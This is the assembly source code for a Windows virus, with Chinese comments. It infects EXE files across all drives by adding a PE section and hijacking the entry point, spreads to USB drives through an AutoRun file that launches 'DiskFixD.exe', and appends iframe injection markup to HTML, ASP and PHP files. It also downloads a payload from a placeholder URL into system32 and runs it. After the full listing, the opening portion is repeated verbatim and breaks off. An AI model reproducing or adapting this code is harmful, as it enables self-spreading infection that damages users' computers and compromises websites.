
.586p
.model flat, stdcall
.CODE
VirusMain:
VirusStart:
call GetDeltaPointer
GetDeltaPointer:
mov ebp,dword ptr [esp]
add esp,4
sub ebp, offset GetDeltaPointer ;重定位
;获取KERNEL32。DLL的基址
GetKernelBase:
mov eax,[esp]
and eax,0ffff0000h
check:
cmp word ptr [eax],5A4Dh; ;比较文件开头是否为MZ 因为DLL也用PE结构
jz checkpe ;如果是就进一步检查看看是不是合法的PE文件
sub eax,10000h ;当然,如果不是基址 就减去一个页
jmp check ; ;重新比较
checkpe:
mov [ebp+Kernel32Address],eax ;先保存kernel32的基址
add eax,[eax+3ch];
cmp word ptr [eax],4550h ;比较是否为PE/0/0
jnz error_Final ;不是就退出程序
jmp Begin ;
APIS:
szwsprintfA db 'wsprintfA',0
_wsprintfA dd 0
szLoadLibraryA db 'LoadLibraryA',0
_LoadLibraryA dd 0
szFreeLibrary db 'FreeLibrary',0
_FreeLibrary dd 0
szReadFile db 'ReadFile',0
_ReadFile dd 0
szWriteFile db 'WriteFile',0
_WriteFile dd 0
szSetFileAttributesA db 'SetFileAttributesA',0
_SetFileAttributesA dd 0
szGetProcAddress db 'GetProcAddress',0
_GetProcAddress dd 0
szURLDownloadToFile db 'URLDownloadToFileA',0
_URLDownloadToFile dd 0
szWinExec db 'WinExec',0
_WinExec dd 0
szGetDriveTypeA db 'GetDriveTypeA',0
_GetDriveType dd 0
szCloseHandle db 'CloseHandle',0
_CloseHandle dd 0
szCreateFileA db 'CreateFileA',0
_CreateFileA dd 0
szCreateFileMappingA db 'CreateFileMappingA',0
_CreateFileMappingA dd 0
szMapViewOfFile db 'MapViewOfFile',0
_MapViewOfFile dd 0
szSetEndOfFile db 'SetEndOfFile',0
_SetEndOfFile dd 0
szSetFilePointer db 'SetFilePointer',0
_SetFilePointer dd 0
szUnmapViewOfFile db 'UnmapViewOfFile',0
_UnmapViewOfFile dd 0
szExitProcess db 'ExitProcess',0
_ExitProcess dd 0
szGetFileSize db 'GetFileSize',0
_GetFileSize dd 0
szFindClose db 'FindClose',0
_FindClose dd 0
szFindFirstFileA db 'FindFirstFileA',0
_FindFirstFileA dd 0
szFindNextFileA db 'FindNextFileA',0
_FindNextFileA dd 0
szSetCurrentDirectoryA db 'SetCurrentDirectoryA',0
_SetCurrentDirectoryA dd 0
szGetCurrentDirectoryA db 'GetCurrentDirectoryA',0
_GetCurrentDirectoryA dd 0
szCopyFileA db 'CopyFileA',0
_CopyFileA dd 0
szGetModuleFileNameA db 'GetModuleFileNameA',0
_GetModuleFileNameA dd 0
DATAS:
UDiskSpreadData:
AutoexecName DB 'AutoExec.inf',0
AutoexecEXEname db 'DiskFixD.exe',0
szWirte db '[AutoRun]',0dh,0ah,'open=DiskFixD.exe',0dh,0ah,'shellexecute=DiskFixD.exe',0
autoexec db 16 dup(0) ;这个是用来实现U盘传播用的
UDiskBuffer db 50 dup (0)
USpreadName db 50 dup (0)
WriteAutoHandle dd 0
;****************************************************上面这个是感染U盘所用到数据
SearchFileData:
FindHandle dd 0
SearchFlag db 1 dup(0)
FoundFlag db 0
FirstFind db 0
FoundNum db 0
FoundFileNum db 0
SearchString db '*.*',0
lpFormat db '%s\%s',0
CurrentDir dd '\:d',0
cPath dd 0
cDir db 100 dup(0)
cSubDir db 260 dup(0)
WIN32_FIND_DATA STRUC
FileAttributes dd 0
CreateTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
FileSizeHigh dd 0
FileSizeLow dd 0
Reserved0 dd 0
Reserved1 dd 0
FullFileName db 260 dup(0)
AlternateFileName db 14 dup(0)
WIN32_FIND_DATA ENDS
win32_find_data WIN32_FIND_DATA <>
;****************************************************上面这个是搜索全盘所用到数据
InfectionData:
Fir_Sec_Addr dd 0
Kernel32Address DD 0
AppStart dd 0
Vlen dd (offset VirusEnd- offset VirusStart)
ImageBase dd 0
HFcreatefilemapping dd 0
HFmapviewoffile dd 0
sec_align dd 0
file_align dd 0
oldEnd dd 0
oldEip dd 0
NewIp dd 0
PE_Head dd 0
FileHandle dd 0
Now_Sec_Addr dd 0
SetJmpOepsize dd (offset SetJmpOepEnd- offset SetJmpOep)
OepData dd 0
Cur_Sec_Addr dd 0
WriteAddr dd 0
;****************************************************上面这个是感染PE文件所用到数据
WebPageSpreadData:
GuaMa db '</iframe>',0 ;替换XX里的数据为挂马的代码
WriteData dd 0
ReadData dd 0
SpreadWebPageH dd 0
;****************************************************上面这个是感染网页所用到数据
OtherData:
InfectedFlag db 0
DownedName db 'c:\windows\system32\exefix.exe',0
DownName db 'http://xxxxxxxxx/xx.exe',0;建议 最好给下扩展名
DownloaderFlag db 'C:\windows\KB962412.txt',0
DllnameUrl db 'urlmon.dll',0
DllNameUser db 'user32.dll',0
;***************************************************************************************************************其他数据
Begin:
GetAPIAddr:
lea esi,[ebp+szCopyFileA]
call GetFunctionAddress
mov [ebp+_CopyFileA],eax
lea esi,[ebp+szGetModuleFileNameA]
call GetFunctionAddress
mov [ebp+_GetModuleFileNameA],eax
lea esi,[ebp+szLoadLibraryA]
call GetFunctionAddress
mov [ebp+_LoadLibraryA],eax
lea esi,[ebp+szFreeLibrary]
call GetFunctionAddress
mov [ebp+_FreeLibrary],eax
lea esi,[ebp+szReadFile]
call GetFunctionAddress
mov [ebp+_ReadFile],eax
lea esi,[ebp+szWriteFile]
call GetFunctionAddress
mov [ebp+_WriteFile],eax
lea esi,[ebp+szSetFileAttributesA]
call GetFunctionAddress
mov [ebp+_SetFileAttributesA],eax
lea esi,[ebp+szGetProcAddress]
call GetFunctionAddress
mov [ebp+_GetProcAddress],eax
lea esi,[ebp+szGetDriveTypeA]
call GetFunctionAddress
mov [ebp+_GetDriveType],eax
lea esi,[ebp+szCloseHandle]
call GetFunctionAddress
mov [ebp+_CloseHandle],eax
lea esi,[ebp+szCreateFileA]
call GetFunctionAddress
mov [ebp+_CreateFileA],eax
lea esi,[ebp+szCreateFileMappingA];
call GetFunctionAddress
mov [ebp+_CreateFileMappingA],eax
lea esi,[ebp+szMapViewOfFile]
call GetFunctionAddress
mov [ebp+_MapViewOfFile],eax
lea esi,[ebp+szSetEndOfFile]
call GetFunctionAddress
mov [ebp+_SetEndOfFile],eax
lea esi,[ebp+szSetFilePointer]
call GetFunctionAddress
mov [ebp+_SetFilePointer],eax
lea esi,[ebp+szUnmapViewOfFile]
call GetFunctionAddress
mov [ebp+_UnmapViewOfFile],eax
lea esi,[ebp+szExitProcess]
call GetFunctionAddress
mov [ebp+_ExitProcess],eax
lea esi, [ebp+szFindFirstFileA]
call GetFunctionAddress
mov [ebp+_FindFirstFileA], eax
lea esi, [ebp+szFindNextFileA]
call GetFunctionAddress
mov [ebp+_FindNextFileA], eax
lea esi,[ebp+szFindClose]
call GetFunctionAddress
mov [ebp+_FindClose],eax
lea esi,[ebp+szGetFileSize];
call GetFunctionAddress
mov [ebp+_GetFileSize],eax
lea esi,[ebp+szSetCurrentDirectoryA]
call GetFunctionAddress
mov [ebp+_SetCurrentDirectoryA],eax
lea esi,[ebp+szGetCurrentDirectoryA]
call GetFunctionAddress
mov [ebp+_GetCurrentDirectoryA],eax
lea esi,[ebp+DllnameUrl]
push esi
call [ebp+_LoadLibraryA]
lea esi,[ebp+szURLDownloadToFile]
push esi
push eax
call [ebp+_GetProcAddress]
mov [ebp+_URLDownloadToFile],eax ;失败就退出 这个函数是用来下载的
lea esi,[ebp+szWinExec]
call GetFunctionAddress
mov [ebp+_WinExec],eax
lea esi,[ebp+DllNameUser]
push esi
call [ebp+_LoadLibraryA]
lea esi,[ebp+szwsprintfA]
push esi
push eax
call [ebp+_GetProcAddress]
mov [ebp+_wsprintfA],eax
;************************************************************需要的函数已经找到了*************************************************************************
@Next:
Spread:
lea esi,[ebp+CurrentDir];检查下是什么盘 硬盘还是U盘
push esi
call [ebp+_GetDriveType]
cmp eax,3 ;假如是硬盘
jnz NOTDISK
call SpreadExeFile
NOTDISK:
cmp eax,2 ;假如是U盘
jnz ADDDISK
call SpreadUDisk
;如果都不是就遍历找咯
ADDDISK:
cmp byte ptr [ebp+CurrentDir],'z';检查是否已经到最后一盘了
jz GoToWork2 ;如果是到最后一盘就说明结束了
inc byte ptr [ebp+CurrentDir] ;C加1就是D了 如此循环26次 因为最多也就到Z盘
jmp Spread ;遍历
SpreadExeFile:
sub esp,4
lea esi,[ebp+CurrentDir]
mov edi,esp
movsd
call SearchFiles; 开始找了
lea edi,[ebp+CurrentDir]
mov esi,esp
movsd
add esp,4
ret
SpreadUDisk:
call WriteAuto
ret
;************************************************************************MAIN程序***************************************************************
SearchFiles:
SearchFirst:
sub esp,4
mov dword ptr [esp],'refV' ;一个感染标志
SearchSec:
lea esi,[ebp+cDir] ;260byte
push esi
push 128h
call [ebp+_GetCurrentDirectoryA] ;调用函数
mov esi,[ebp+CurrentDir]
cmp byte ptr [ebp+SearchFlag],0 ;检查是否为0 为0 说明不是新的文件甲那么就直接执行下去
jnz SearchBegin ;不为0就跳过去
lea esi,[ebp+CurrentDir]
push esi
lea edi,[ebp+cSubDir]
mov ecx,3
rep movsb
pop esi
SearchBegin:
push esi ;设置指定的盘
call [ebp+_SetCurrentDirectoryA] ;获取盘
lea esi,[ebp+win32_find_data]
push esi ;
lea edx,[ebp+SearchString]
push edx
call [ebp+_FindFirstFileA] ;开始查找 找的是*.* 之后再分析
mov [ebp+FindHandle],eax ;保存句柄
inc eax
jz SearchClose ;是否为0 为0就是失败 失败就退出
dec eax
SearchAgian:
cmp byte ptr [ebp+win32_find_data.FullFileName],'.';是就继续查找
jz SearchNext ;如果不是上一级就不
cmp [ebp+win32_find_data.FileAttributes],10h;是否为文件夹
jz SaveDir ;不是文件夹
cmp [ebp+win32_find_data.FileAttributes],16h
jz SearchNext ;如果发现是系统目录就直接跳过去
cmp [ebp+win32_find_data.FileAttributes],11h
jz SearchNext ;如果发现是系统目录就直接跳过去
cmp [ebp+win32_find_data.FileAttributes],30h;是否为文件夹
jz SaveDir ;不是文件夹
;遍历操作
search:
mov byte ptr [ebp+win32_find_data.FullFileName+250],0BBH
xor ecx,ecx
search2E:
inc cl ;再次查找 是否为0
cmp byte ptr [ebp+win32_find_data.FullFileName+ecx],0BBH
jz SearchNext
cmp byte ptr [ebp+win32_find_data.FullFileName+ecx],'.'
jnz search2E
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'exe.' ;查到是EXE文件
jnz SearchEXE
pushad
call InfectFiles
popad
SearchEXE:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'EXE.' ;查到是EXE文件
jnz SearchHTM
pushad
call InfectFiles
popad
SearchHTM:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'mth.' ;查到是HTM文件
jnz SearchASP
pushad
call SpreadWebPage
popad
SearchASP:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'psa.' ;查到是ASP文件
jnz SearchPHP
pushad
call SpreadWebPage
popad
SearchPHP:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'php.' ;查到是PHP文件
jnz SearchHTML
pushad
call SpreadWebPage
popad
SearchHTML:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx+1],'lmth' ;查到是HTML文件
jnz SearchNext
pushad
call SpreadWebPage
popad
jmp SearchNext
SaveDir:
cmp byte ptr [ebp+FoundFlag],0
jz SaveDir@
sub esp,4
mov dword ptr [esp],0BBBBBBBBH
SaveDir@:
sub esp,20h
mov edi,esp
lea esi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb ;保存目录的名字
mov byte ptr [ebp+FoundFlag],0
inc byte ptr [ebp+FoundNum]
SearchNext:
lea ebx,[ebp+win32_find_data]
push ebx
push [ebp+FindHandle]
call [ebp+_FindNextFileA]
or eax,eax
jnz SearchAgian ;如果还有文件要查找
mov byte ptr [ebp+FoundFlag],1 ;设置标志说明要进入下一个层了
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
;如果不是扫描完毕 就继续
cmp dword ptr [esp],0BBBBBBBBH
jz UpDir ;说明该层已经结束了 进入上一层
mov esi,esp
lea edi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb
add esp,20h ;把目录拿出来 接下来就是进入先的目录了
cmp byte ptr [ebp+FoundNum],0
jz UpDir1 ;说明该层已经结束了 进入上一层
cmp byte ptr [ebp+FirstFind],2
jb SetNewDir ;不为0 就是不操作了
mov byte ptr [ebp+FoundNum],0
jmp SetNewDir
UpDir1:
xor ecx,ecx
Check_:
cmp byte ptr [ebp+cSubDir+98+ecx],05ch
jz Find_
add ecx,-1
jmp Check_
Find_:
mov byte ptr [ebp+cSubDir+98+ecx],0 ;设置为0 因为都是以0为参考的
lea edi,[ebp+cSubDir+98+ecx]
mov ecx,30h
xor eax,eax
rep stosb
lea edi,[ebp+cSubDir]
mov [ebp+CurrentDir],edi
jmp SetNewDir
UpDir:
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
xor ecx,ecx
Check_1:
cmp byte ptr [ebp+cSubDir+98+ecx],05ch
jz Find_1
add ecx,-1
jmp Check_1
Find_1:;
add ecx,-1
cmp byte ptr [ebp+cSubDir+98+ecx],05ch ;就修改
jnz Find_1
mov byte ptr [ebp+cSubDir+98+ecx],0
cmp dword ptr [esp],0BBBBBBBBH
jnz Find_3
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
Find_2:
add ecx,-1
cmp byte ptr [ebp+cSubDir+98+ecx],05ch ;就修改
jnz Find_2
mov byte ptr [ebp+cSubDir+98+ecx],0
cmp dword ptr [esp],0BBBBBBBBH
jnz Find_3
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
jmp Find_2
Find_3:
lea edi,[ebp+cSubDir+98+ecx]
mov ecx,30h
xor eax,eax
rep stosb
lea edi,[ebp+cSubDir]
mov [ebp+CurrentDir],edi
mov esi,esp
lea edi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb
add esp,20h ;把目录拿出来 接下来就是进入先的目录了
;lea esi,[ebp+win32_find_data.FullFileName]
;mov ecx,20h
;rep movsb
;mov byte ptr [ebp+SearchFlag],1
;jmp SearchSec
SetNewDir:
lea edx,[ebp+win32_find_data.FullFileName];16 22
push edx ;第一个参数
mov esi,[ebp+CurrentDir]
cmp byte ptr [ebp+SearchFlag],0
jnz IsDir
LEA esi,[ebp+CurrentDir] ;第二个参数
IsDir:
push esi
lea edx,[ebp+lpFormat]
push edx ;第三个参数
lea edx,[ebp+cSubDir]
push edx ;第四个参数
call [ebp+_wsprintfA] ;设置
add esp,10h
lea eax,[ebp+cSubDir] ;做为地址
mov [ebp+CurrentDir],eax
mov byte ptr [ebp+SearchFlag],1
lea eax,[ebp+cSubDir]
mov [ebp+CurrentDir],eax
inc byte ptr [ebp+FirstFind]
mov byte ptr [ebp+FoundNum],0
jmp SearchSec
FixedBeforeSearchHandleClose:
add esp,4
SearchHandleClose:
push dword ptr[ebp+FindHandle]
call [ebp+_FindClose]
SearchClose:
ret
;*******************************************************************以上是查找过程**********************************************************************
WriteAuto:
;U盘传播的code
;直接覆盖原来的文件
xor edi,edi
lea edi,[ebp+autoexec];申请一段空白
lea esi,[ebp+CurrentDir]
push 03h
pop ecx
rep movsb
push edi
lea edi,[ebp+USpreadName]
rep movsb
lea esi,[ebp+AutoexecEXEname]
push 0ch
pop ecx
rep movsb
pop edi
xor esi,esi
lea esi,[ebp+AutoexecName]
push 0ch
pop ecx
rep movsb
lea esi,[ebp+autoexec]
call OpenFile ;建立一个文件Autoexec.inf文件
inc eax
test eax,eax
jz WriteAutoClose
dec eax
mov [ebp+WriteAutoHandle],eax
push 0
push [ebp+WriteData]
push 55;字节数
lea edx,[ebp+szWirte]
push edx
push eax
call [ebp+_WriteFile] ;写文件 因为重写所以无须设置位置
push [ebp+WriteAutoHandle]
call [ebp+_CloseHandle]
;现在我们设置文件属性
push 6
push edx
call [ebp+_SetFileAttributesA]
push 32h
lea esi,[ebp+UDiskBuffer]
push esi
push 0
call [ebp+_GetModuleFileNameA]
test eax,eax ;是否错误
jz WriteAutoClose ;失败就退出
push 0
lea esi,[ebp+USpreadName]
push esi
lea esi,[ebp+UDiskBuffer]
push esi
call [ebp+_CopyFileA]
WriteAutoClose:
ret
;**************************************************************************以上过程是U盘传播************************************************************
SpreadWebPage:
;网页传播的code
;先检查下文件的末尾是否有</frame>字样 有说明文件已经被感染了 就退出 没有就写入
lea esi,[ebp+win32_find_data.FullFileName];
push 80H
push esi
call [ebp+_SetFileAttributesA];先设置属性
call OpenFileE
mov [ebp+SpreadWebPageH],eax
inc eax
test eax,eax
jz SpreadError
;设置位置
mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow]
sub ecx,9;因为那个标志占了 9个字符
push 1
xor eax,eax
push eax
push ecx
push [ebp+SpreadWebPageH]
call [ebp+_SetFilePointer]
;接下来设置下标志
push 0
lea esi,[ebp+ReadData]
push esi
push 9
lea esi,[ebp+GuaMa]
push esi
push [ebp+SpreadWebPageH]
call [ebp+_ReadFile] ;查找标志
test eax,eax
jz SpreadClose ;如果找到就退出
;这里开始写挂马的代码
push 2
xor eax,eax
push eax
push eax
push [ebp+SpreadWebPageH]
call [ebp+_SetFilePointer]
push 0
lea esi,[ebp+WriteData]
push esi
;***************************************************有个假设
push 9 ;这里的X是挂马的数据大小
;******************************************************************
lea esi,[ebp+GuaMa]
push esi
push [ebp+SpreadWebPageH]
call [ebp+_WriteFile]
;写入数据完毕
SpreadClose:
push [ebp+SpreadWebPageH]
call [ebp+_CloseHandle]
SpreadError:
ret
;*************************************************************************以上的是网页传播**************************************************************
InfectFiles:
lea esi,[ebp+win32_find_data.FullFileName];
push 80H
push esi
call [ebp+_SetFileAttributesA]
call OpenFile
mov [ebp+FileHandle],eax
inc eax
test eax,eax
jz error_Final
mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow]
add ecx,01000h
push ecx
call CreateMap
test eax,eax
jz error_CreateMap
mov [ebp+HFcreatefilemapping],eax;
pop ecx
call MapFile
test eax,eax
jz error_MapFile
mov [ebp+HFmapviewoffile],eax
Injection:
xchg esi,eax
cmp word ptr [esi],5A4Dh;
jnz error_MapFile
add esi,[esi+3ch];
cmp word ptr [esi],4550h
jnz error_MapFile
cmp dword ptr [esi+08h],'vfer'
jz @Close ;has been infect
mov [ebp+PE_Head],esi
push 0h
pop dword ptr [esi+0d0h]
push 0h
pop dword ptr[esi+0d4h]
mov ebx, dword ptr[esi+38h]
mov [ebp+sec_align],ebx
mov edi,dword ptr [esi+3ch]
mov [ebp+file_align],edi
mov ebx,dword ptr [esi+28h]
add ebx,[esi+34h]
mov [ebp+oldEip],ebx
movzx ebx,word ptr [esi+14h];
lea eax,[esi+ebx+18h];
movzx ecx,word ptr [esi+06h];
cmp ecx,8
ja @Close
xchg esi,eax
mov dword ptr [ebp+Fir_Sec_Addr],esi
;****************************************************************************************************************************
;First i check if program had been packed
;*******************************************************************************************************************************
RandNum:
RDTSC;
and eax,00000002h;
xchg eax,ecx
imul ecx,ecx,28h;
add esi,ecx;;
mov dword ptr [ebp+Cur_Sec_Addr],esi
mov ebx,dword ptr [esi+08h];
mov edx,dword ptr [esi+0ch];
add edx,ebx
mov dword ptr [ebp+OepData],edx;
mov edx,dword ptr [esi+10h];
sub edx,dword ptr [esi+08h];
js error_MapFile ;
mov edi,dword ptr [esi+14h];
add edi,dword ptr [esi+08h]
add edi,dword ptr [ebp+HFmapviewoffile];
sub edx,5
RandData:
push edx
RDTSC
pop edx
AND eax,edx
test eax,eax
jz RandData
mov edx,dword ptr [ebp+OepData]
add edx,eax
mov dword ptr[ebp+OepData],edx
add edi,eax
mov dword ptr [ebp+WriteAddr],edi
cmp dword ptr [edi],00000000h
jnz error_MapFile
;***********************************************************
; ok if the program hadnt packed i append a section
;**************************************************************
mov esi,dword ptr [PE_Head]
movzx ecx,word ptr[esi+06h] ;
inc word ptr [esi+06h]
imul ecx,ecx,28h ;
mov esi,dword ptr [ebp+Fir_Sec_Addr]
add esi,ecx
mov dword ptr [ebp+Now_Sec_Addr],esi
mov dword ptr[esi],' '
mov ebx,dword ptr[ebp+Vlen]
mov dword ptr [esi+08h],ebx
mov dword ptr [esi+24h],0e0000020h
mov eax,dword ptr [esi-28h+08h] ;
mov ebx,dword ptr[ebp+sec_align]
cmp eax,ebx
xor ecx,ecx
jb @1
@@@@1:
push eax
sub eax,ebx
js @@@@2
inc ecx
pop eax
sub eax,dword ptr [ebp+sec_align]
jmp @@@@1
@@@@2:
pop eax
inc ecx
mov eax,dword ptr [ebp+sec_align]
mul ecx
xchg eax,ebx
@1:
add ebx,dword ptr [esi-28h+0ch]
mov dword ptr [esi+0ch],ebx
@@1:
mov dword ptr [ebp+NewIp],ebx
mov eax,dword ptr [ebp+Vlen]
mov ebx,dword ptr [ebp+file_align];
xor ecx,ecx
cmp eax,ebx
jb @2
@@@@3:
push eax
sub eax,ebx
js @@@@4
inc ecx
pop eax
sub eax,dword ptr [ebp+file_align]
jmp @@@@3
@@@@4:
pop eax
inc ecx
mov eax,dword ptr [ebp+file_align]
mul ecx
xchg eax,ebx
@2:
mov dword ptr [esi+10h],ebx
@@2:
mov eax,dword ptr [esi-28h+14h]
mov ebx,dword ptr [esi-28h+10h]
add eax,ebx
mov dword ptr [esi+14h],eax
mov [ebp+oldEnd],eax ;
;******************************************************************************************************************************************************
;Here i set "JMP xxxxxxxx" in the space where alway no data in it
; however, you also can set other data or code in it if the area have enough space
;******************************************************************************************************************************************************
RandSetData:
mov edi,dword ptr [ebp+WriteAddr] ; haha a joke
mov esi,offset SetJmpOep
mov ecx,[ebp+SetJmpOepsize]
cld
rep movsb
mov edx,dword ptr [ebp+OepData]
add edx,5
mov esi,dword ptr [ebp+Now_Sec_Addr]
mov ebx,dword ptr [esi+0ch]
sub ebx,edx
mov dword ptr [edi],ebx
mov eax,dword ptr [ebp+PE_Head]
mov ebx,dword ptr [ebp+OepData]
mov dword ptr [eax+28h],ebx
mov ebx,[eax+50h]
add ebx,[ebp+Vlen]
mov ecx,[ebp+sec_align]
xor edx,edx
xchg eax,ebx
cdq
div ecx
test edx,edx
je @@@4
inc eax
@@@4:
mul ecx
xchg eax,ebx
mov [eax+50h],ebx
mov dword ptr [eax+8h],'vfer'
cld
mov ecx,[ebp+Vlen]
mov edi,[ebp+oldEnd]
add edi,[ebp+HFmapviewoffile]
lea esi,[ebp+VirusStart]
rep movsb
xor eax,eax
sub edi,[ebp+HFmapviewoffile]
push 0h
push 0h
push edi
push [ebp+FileHandle]
call [ebp+_SetFilePointer]
push [ebp+FileHandle]
call [ebp+_SetEndOfFile]
@Close:
call UnMapFile
call UnCreateMap
call UnOpenFile
ret
;*****************************************************************以上的这个是EXE感染过程****************************************************************
GetFunctionAddress PROC
mov eax, [ebp+Kernel32Address] ;EAX = Kernel32 Address
mov ebx, [eax+3Ch]
add ebx, eax
add ebx, 120
mov ebx, [ebx]
add ebx, eax ;EBX = Export Address
xor edx, edx
mov ecx, [ebx+32]
add ecx, eax
push esi
push edx
CompareNext:
pop edx
pop esi
inc edx
mov edi, [ecx]
add edi, eax
add ecx, 4
push esi
push edx
CompareName:
mov dl, [edi]
mov dh, [esi]
cmp dl, dh
jne CompareNext
inc edi
inc esi
cmp byte ptr [esi], 0
je GetAddress
jmp CompareName
GetAddress:
pop edx
pop esi
dec edx
shl edx, 1
mov ecx, [ebx+36]
add ecx, eax
add ecx, edx
xor edx, edx
mov dx, [ecx]
shl edx, 2
mov ecx, [ebx+28]
add ecx, eax
add ecx, edx
add eax, [ecx]
ret
GetFunctionAddress ENDP
MapFile proc ; ECX为文件大小
xor eax,eax
push ecx
push eax
push eax
push 00000002h
push dword ptr [ebp+HFcreatefilemapping]
call [ebp+_MapViewOfFile]
ret
MapFile endp
CreateMap proc ;Ecx为病毒大小
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
CreateMap endp
OpenFile proc
xor eax,eax ;ESI指向病毒的句柄
push eax
push eax
push 00000003h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA] ;打开指定文件
ret
OpenFile endp
OpenFileE proc
xor eax,eax ;ESI指向病毒的句柄
push eax
push 00000080h
push 00000004h
push eax
push 00000002h
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA] ;打开指定文件
ret
OpenFileE endp
SetJmpOep:
db 0E9h
SetJmpOepEnd:
UnMapFile proc
push [ebp+HFmapviewoffile]
call [ebp+_UnmapViewOfFile]
ret
UnMapFile endp
UnCreateMap proc
push [ebp+HFcreatefilemapping]
call [ebp+_CloseHandle];
ret
UnCreateMap endp
UnOpenFile proc
push [ebp+FileHandle]
call [ebp+_CloseHandle]
ret
UnOpenFile endp
GoToWork:
;********************************************************************************************
;这里是要执行代码
;先检查下是否为已经下载
mov byte ptr [ebp+InfectedFlag],1
GoToWork2:
push 80h
lea esi,[ebp+DownloaderFlag]
push esi
call [ebp+_SetFileAttributesA]
test eax,eax;如果失败了
jnz CheckBeforBack
;如果要下载多个程序
xor eax,eax
push eax
push eax
lea esi,[ebp+DownedName]
push esi
lea esi,[ebp+DownName]
push esi
push eax
call [ebp+_URLDownloadToFile]
;下载完毕 接着 设置标志 建立一个文件
lea esi,[ebp+DownloaderFlag]
call OpenFileE ;打开文件
push eax
call [ebp+_CloseHandle]
;设置标志完成
push 1
lea esi,[ebp+DownedName]
push esi
call [ebp+_WinExec]
CheckBeforBack:
cmp byte ptr [ebp+InfectedFlag],1
jnz @Exit
;要执行的代码
GoBack:
mov eax,dword ptr[ebp+oldEip]
jmp eax
error_MapFile:
call UnMapFile
error_CreateMap:
call UnCreateMap
error_Final:
call UnOpenFile
ret
@Exit:
push 0h
call [ebp+_ExitProcess];
VirusEnd:
end VirusMain
.model flat, stdcall
.CODE
VirusMain:
VirusStart:
call GetDeltaPointer
GetDeltaPointer:
mov ebp,dword ptr [esp]
add esp,4
sub ebp, offset GetDeltaPointer ;重定位
;获取KERNEL32。DLL的基址
GetKernelBase:
mov eax,[esp]
and eax,0ffff0000h
check:
cmp word ptr [eax],5A4Dh; ;比较文件开头是否为MZ 因为DLL也用PE结构
jz checkpe ;如果是就进一步检查看看是不是合法的PE文件
sub eax,10000h ;当然,如果不是基址 就减去一个页
jmp check ; ;重新比较
checkpe:
mov [ebp+Kernel32Address],eax ;先保存kernel32的基址
add eax,[eax+3ch];
cmp word ptr [eax],4550h ;比较是否为PE/0/0
jnz error_Final ;不是就退出程序
jmp Begin ;
APIS:
szwsprintfA db 'wsprintfA',0
_wsprintfA dd 0
szLoadLibraryA db 'LoadLibraryA',0
_LoadLibraryA dd 0
szFreeLibrary db 'FreeLibrary',0
_FreeLibrary dd 0
szReadFile db 'ReadFile',0
_ReadFile dd 0
szWriteFile db 'WriteFile',0
_WriteFile dd 0
szSetFileAttributesA db 'SetFileAttributesA',0
_SetFileAttributesA dd 0
szGetProcAddress db 'GetProcAddress',0
_GetProcAddress dd 0
szURLDownloadToFile db 'URLDownloadToFileA',0
_URLDownloadToFile dd 0
szWinExec db 'WinExec',0
_WinExec dd 0
szGetDriveTypeA db 'GetDriveTypeA',0
_GetDriveType dd 0
szCloseHandle db 'CloseHandle',0
_CloseHandle dd 0
szCreateFileA db 'CreateFileA',0
_CreateFileA dd 0
szCreateFileMappingA db 'CreateFileMappingA',0
_CreateFileMappingA dd 0
szMapViewOfFile db 'MapViewOfFile',0
_MapViewOfFile dd 0
szSetEndOfFile db 'SetEndOfFile',0
_SetEndOfFile dd 0
szSetFilePointer db 'SetFilePointer',0
_SetFilePointer dd 0
szUnmapViewOfFile db 'UnmapViewOfFile',0
_UnmapViewOfFile dd 0
szExitProcess db 'ExitProcess',0
_ExitProcess dd 0
szGetFileSize db 'GetFileSize',0
_GetFileSize dd 0
szFindClose db 'FindClose',0
_FindClose dd 0
szFindFirstFileA db 'FindFirstFileA',0
_FindFirstFileA dd 0
szFindNextFileA db 'FindNextFileA',0
_FindNextFileA dd 0
szSetCurrentDirectoryA db 'SetCurrentDirectoryA',0
_SetCurrentDirectoryA dd 0
szGetCurrentDirectoryA db 'GetCurrentDirectoryA',0
_GetCurrentDirectoryA dd 0
szCopyFileA db 'CopyFileA',0
_CopyFileA dd 0
szGetModuleFileNameA db 'GetModuleFileNameA',0
_GetModuleFileNameA dd 0
DATAS:
UDiskSpreadData:
AutoexecName DB 'AutoExec.inf',0
AutoexecEXEname db 'DiskFixD.exe',0
szWirte db '[AutoRun]',0dh,0ah,'open=DiskFixD.exe',0dh,0ah,'shellexecute=DiskFixD.exe',0
autoexec db 16 dup(0) ;这个是用来实现U盘传播用的
UDiskBuffer db 50 dup (0)
USpreadName db 50 dup (0)
WriteAutoHandle dd 0
;****************************************************上面这个是感染U盘所用到数据
SearchFileData:
FindHandle dd 0
SearchFlag db 1 dup(0)
FoundFlag db 0
FirstFind db 0
FoundNum db 0
FoundFileNum db 0
SearchString db '*.*',0
lpFormat db '%s\%s',0
CurrentDir dd '\:d',0
cPath dd 0
cDir db 100 dup(0)
cSubDir db 260 dup(0)
WIN32_FIND_DATA STRUC
FileAttributes dd 0
CreateTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
FileSizeHigh dd 0
FileSizeLow dd 0
Reserved0 dd 0
Reserved1 dd 0
FullFileName db 260 dup(0)
AlternateFileName db 14 dup(0)
WIN32_FIND_DATA ENDS
win32_find_data WIN32_FIND_DATA <>
